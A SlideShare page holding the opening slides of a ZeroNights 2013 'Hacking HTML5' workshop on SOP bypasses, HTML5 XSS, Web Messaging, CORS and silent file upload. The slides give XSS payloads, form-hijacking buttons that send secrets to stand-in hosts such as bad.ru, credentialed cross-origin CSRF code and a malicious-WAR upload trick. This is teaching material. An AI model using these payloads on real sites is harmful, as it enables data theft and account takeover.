Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs SilverlightMatt Casto
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPiyush Pattanayak
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
14. html 5 security considerations
14. html 5 security considerations14. html 5 security considerations
14. html 5 security considerationsEoin Keary
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 

Similar to Krzysztof Kotowicz - Hacking HTML5 (20)

Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs Silverlight
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
14. html 5 security considerations
14. html 5 security considerations14. html 5 security considerations
14. html 5 security considerations
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 

More from DefconRussia

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

More from DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Recently uploaded

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

Krzysztof Kotowicz - Hacking HTML5

  • 1. http://10.10.0.1/ VirtualBox (~4 gb needed) No VirtualBox? Apache + PHP Chrome + Firefox unpack zeronights.zip host root dir as //localvictim and //127.0.0.1 shared folder - dir with upacked zeronights.zip login:ubuntu, pass: ? /evil dir as //evil Hacking HTML5 Krzysztof Kotowicz ZeroNights 2013
  • 2. /whoami • I work at SecuRing and Cure53 • I do web security research • I present at cons (BlackHat, BRUCon, Hack In Paris, OWASP AppSec, CONFidence, ...) • @kkotowicz • blog.kotowicz.net Plan hacks = [ "Same Origin Policy — quirks, flavors & bypasses", "XSSing with HTML5 — twisted vectors & amazing exploits", "Exploiting Web Messaging", "Attacking with Cross Origin Resource Sharing", "Targeting Client side storage and Offline Cache Poisoning", "Using WebSockets for attacks", "Iframe sandboxing & clickjacking", "Bypassing Content Security Policy", "Webkit XSS Auditor & IE Anti-XSS filter — behind the scenes", ]
  • 3. Plan def plan(): ! general_intro() ! known = [js, xss, http, ..] ! ! ! ! for h in hacks: ! known.append(h) ! intro(h, short=True) ! attack_with(known) Disclaimer • Workshops highly practical • Firebug & similar tools knowledge assumed • Medium-to-hard tasks • Limited time - try at home! • Ask questions please! • Of course - use all this for educational purposes & doing legitimate stuff
  • 4. Lab setup • ubuntu:ubuntu • http://localvictim • http://evil • /home/ubuntu/Desktop/remote/ • evil/solutions Same Origin Policy quirks, flavors & bypasses
  • 5. Same Origin Policy • • Security model for the web • Origin = scheme + host + port Restrict communication between applications from different origins http://example.com/document http://example.com/other/document/here https://example.com/document https://www.example.com/document http://example.com:8080/document  Same Origin Policy • Multiple same origin policies - cookies, DOM access, Flash, Java, XMLHttpRequest • Different rules for policies • Multiple quirks
  • 6. SOP Bypass vs XSS • SOP bypass = read / write across origins • e.g. read DOM elements • set cookies • browser / specs bug • XSS - execute code on target origin • application bug SOP Quirks • Java applets • example.com === example.net $ host example.com example.com has address 93.184.216.119 $ host example.net example.net has address 93.184.216.119 • Shared hosting => SOP bypass
  • 7. SOP Quirks matter • IE - port does not == http://example.com/ http://example.com:8080 • cookies: Any subdomain can set cookies to parent domains • microsoft.com must trust all *.microsoft.com sites SOP Quirks • cookie forcing - write arbitrary cookies • HTTPS • Set-Cookie: admin=false; secure • HTTP (man-in-the-middle) • Set-Cookie: admin=true; secure • Cookie: admin=true;
  • 8. SOP side-channels • • • • • • window.name <iframe name="yup.anything!you()want"> window.open('a_name') setting location traversing iframes top.frames[1].frames[2].length top.frames[1].frames[2].location= iframe height, scrolling positions timing SVG filters - http://www.contextis.com/files/ Browser_Timing_Attacks.pdf Practice! • http://localvictim/01-sop/1/ • alert ‘secret’ value • http://localvictim/01-sop/2/ • detect if user is logged in or not (x-domain) • * http://localvictim/01-sop/1/index2.php • alert ‘secret’ value
  • 9. XSSing with HTML5 twisted vectors & amazing exploits XSS in HTML5 <input|button autofocus> <math> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME <mtext>http://google.com</mtext> </maction> </math> <input oninput=alert(1) autofocus> <div style="height:30px;overflow:scroll" onscroll=alert(1)>.......</div>
  • 10. XSS in HTML5 • Interesting form based vectors: <form id="f"> ... <button form=f formaction=//evil.me formtarget=...> <button form=f type=submit> • • • Send form to your server Change target window Change encoding XSS in HTML5 <form id=f action=https://benign.com> <input name=secret> </form> // anywhere in the document - notice no JS! <button form=f formaction=http://bad.ru>CLICK </button>
  • 11. XSS in HTML5 • Data: URIs data:[<MIME-type>][;charset=<charset>][;base64],<data> <a href=”data:text/html, <script>alert(1)</script>”>XSS</a> <a href=”data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> btoa() • Evade filters XSS in HTML5 • HTML5 helps with the exploitation • WebSockets connection with C&C • Extract local DB, geolocation, HTML5 filesystem • • // stealth mode history.pushState('/innocent-url') // persistence localStorage['code']='alert(/delayed/)'; // months later eval(localStorage['code'])
  • 12. Practice! • http://localvictim/02-xss/ • alert one • * send csrf token to //evil Exploiting Web Messaging
  • 13. Web Messaging Web browsers, for security and privacy reasons, prevent documents in different domains from affecting each other; that is, cross-site scripting is disallowed. While this is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile. This section introduces a messaging system that allows documents to communicate with each other regardless of their source domain, in a way designed to not enable cross-site scripting attacks. http://www.w3.org/TR/webmessaging/ Web Messaging • ...designed not to enable XSS • http://html5demos.com/ postmessage2
  • 14. Web Messaging • client-side window-to-window communication • no server, no TCP traffic! • cross domain by default Web Messaging <html> // my.domain <iframe src=//other.domain/widget></iframe> // sender var w = frameElement.contentWindow; var wOrigin = 'http://example.com'; // or "*" w.postMessage('hi!', wOrigin); // receiver window.addEventListener("message", function(e) { if (e.origin !== "http://example.com") { alert('Ignoring ' + e.origin); } else { alert(e.origin + " said: " + e.data); } }, false);
  • 15. Web Messaging bugs // frame could get replaced, you're sending to attacker!!! frame.postMessage({secret:stuff}, "*"); window.addEventListener("message", function(e) { ! // no sender validation ! do_stuff_with(e.data); ! // are you kidding me?? ! div.innerHTML = e.data; } Practice! • http://localvictim/03-messaging/ • XSS the victim • * hijack the contents of an email when user enters it
  • 16. Attacking with Cross Origin Resource Sharing CORS • Cross domain XHR, with credentials: • cookies • SSL/TLS client certificate • HTTP auth credentials • Target server decides to allow/forbid
  • 17. Classic XHR • In domain only CORS • Cross-domain allowed
  • 18. CORS • XHR request reaches the target server • With appropriate credentials • Can be abused for Cross Site Request Forgery CORS // http://attacker.cn var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim.ch"); xhr.setRequestHeader("Content-Type", "text/ plain"); xhr.withCredentials = "true"; // cookies etc. xhr.send("Anything");
  • 19. CORS on the wire Simple request GET /data/ HTTP/1.1 Host: target.example Origin: http://src.example … HTTP/1.1 200 OK Date: Mon, 01 Dec 2008 00:23:53 GMT Server: Apache/2.0.61 Access-Control-Allow-Origin: http://src.example Content-Type: application/json {"secret-data":xxxxxx} CORS on the wire preflight OPTIONS /data/ HTTP/1.1 Host: target.example Origin: http://src.example Access-Control-Request-Method: POST Access-Control-Request-Headers: X-MyHeader … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: X-MyHeader Access-Control-Max-Age: 1728000
  • 20. CORS on the wire preflight POST /data/ HTTP/1.1 Host: target.example Origin: http://src.example Content-Type: text/xml; charset=UTF-8 Content-Length: xxx X-MyHeader: apikey=23423423 <?xml ..... … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Content-Type: text/plain ok CORS - weaknesses • Again, wildcards: • Access-Control-Allow-Origin: * = everybody can read me • A-C-A-O: <sender-origin> is even worse • You can use CORS to send arbitrary blind requests (CSRF) • What if receiver is malicious?
  • 21. Silent file upload Content-Type: multipart/form-data; boundary=AaB03x --AaB03x Content-Disposition: form-data; name="submit-name" Larry --AaB03x Content-Disposition: form-data; name="files"; filename="file1.txt" Content-Type: text/plain ... contents of file1.txt ... --AaB03x-- x end hr.s ("A ing nyth Silent file upload xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=xxx"); xhr.send(' --xxxrn Content-Disposition: form-data; name="files"; filename="file1.txt"rn Content-Type: text/plainrn rn ANYTHINGrn --xxx--'); ");
  • 22. Silent file upload • Simulates multipart/form-data request with <input type=file> upload • Already used to: • Replace firmware in routers • Take control of application servers logUrl = 'http://glassfishserver/ management/domain/applications/ application'; fileUpload(c,"maliciousarchive.war"); Content injection • http://website/#/a/page xhr.open("GET", "/a/page"); • https://touch.facebook.com/#http:// example.com/xss.php HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: text/html <img src=x onerror=alert(1)>
